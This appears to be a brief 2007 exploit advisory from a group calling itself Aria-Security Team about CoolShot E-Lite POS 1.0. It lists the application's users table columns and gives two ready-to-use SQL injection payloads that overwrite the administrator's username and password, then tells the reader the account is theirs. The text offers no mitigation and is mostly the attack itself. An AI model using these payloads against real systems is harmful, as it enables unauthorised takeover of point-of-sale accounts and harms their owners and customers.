|
Aria-Security Team
http://aria-security.net
-------------------------------------
CoolShot E-Lite POS 1.0
http://coolshot.net/index.php/works/49-e-lite-pos
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108
Published on November 24 2007
users.user_id
users.user_name
users.user_email
users.user_admin
users.user_auth
users.user_pw
use these two queries
-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');--
-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');--
there you go with the user admin and password hacked.
Credits Goes to Aria-Security Team
A SPECIAL THANKS TO: AurA
Regards,
The-0utl4w